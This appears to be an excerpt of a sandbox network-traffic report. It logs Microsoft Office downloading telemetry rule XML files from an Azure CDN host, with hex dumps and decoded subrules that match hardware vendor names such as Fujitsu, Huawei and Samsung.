2024-10-30 02:46:36 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


Session IDSource IPSource PortDestination IPDestination Port
19192.168.2.44977313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:36 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:36 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:36 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8CEAC16"
x-ms-request-id: d5e28e91-a01e-0021-638f-27814c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024636Z-r197bdfb6b47gqdjvmbpfaf2d000000002gg00000000hmhg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:36 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
20192.168.2.44977513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:36 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:36 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:36 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB7010D66"
x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024636Z-16849878b78km6fmmkbenhx76n00000006q000000000pnfn
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:36 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
21192.168.2.44977613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:37 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:37 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:37 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
ETag: "0x8DC582B9748630E"
x-ms-request-id: bfc21b6c-401e-0067-2636-2809c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024637Z-15b8d89586fzhrwgk23ex2bvhw0000000a8000000000hrav
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
22192.168.2.44977713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:37 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:37 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:37 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DACDF62"
x-ms-request-id: 864201cb-901e-0015-2b18-26b284000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024637Z-16849878b78km6fmmkbenhx76n00000006rg00000000fz66
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:37 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
23192.168.2.44977913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:37 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:37 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:37 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
ETag: "0x8DC582B9C8E04C8"
x-ms-request-id: de33ccc9-c01e-008e-25fe-267381000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024637Z-16849878b78j5kdg3dndgqw0vg000000093000000000k3q8
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:37 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
24192.168.2.44977813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:37 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:37 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:37 GMT
Content-Type: text/xml
Content-Length: 404
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
ETag: "0x8DC582B9E8EE0F3"
x-ms-request-id: 04619d75-001e-0014-5e75-295151000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024637Z-r197bdfb6b4d9xksru4x6qbqr000000007ng000000000wdd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:37 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session IDSource IPSource PortDestination IPDestination Port
25192.168.2.44978013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:37 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:37 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:37 GMT
Content-Type: text/xml
Content-Length: 428
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
ETag: "0x8DC582BAC4F34CA"
x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024637Z-16849878b78qwx7pmw9x5fub1c00000005e000000000ts1w
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:37 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
26192.168.2.44978113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:38 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 499
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
ETag: "0x8DC582B98CEC9F6"
x-ms-request-id: afbd30f1-101e-007a-739c-27047e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-17c5cb586f69w69mgazyf263an00000006r0000000001x8w
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:38 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
27192.168.2.44978213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:38 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B988EBD12"
x-ms-request-id: 50755ed9-801e-00ac-015e-27fd65000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-17c5cb586f65j4snvy39m6qus400000002t0000000005wpr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:38 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session IDSource IPSource PortDestination IPDestination Port
28192.168.2.44978313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:38 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5815C4C"
x-ms-request-id: 46a88b53-101e-0017-7e74-2747c7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-16849878b78g2m84h2v9sta29000000006a000000000e6za
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:38 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
29192.168.2.44978413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:38 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB32BB5CB"
x-ms-request-id: 128a8aa7-901e-005b-27fd-272005000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-15b8d89586fpccrmgpemqdqe5800000002a00000000079t0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
30192.168.2.44978513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:38 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:38 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:38 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8972972"
x-ms-request-id: 9969a17a-a01e-0021-051b-28814c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024638Z-r197bdfb6b4mcssrk8cfa4gm1g000000011000000000fhv3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
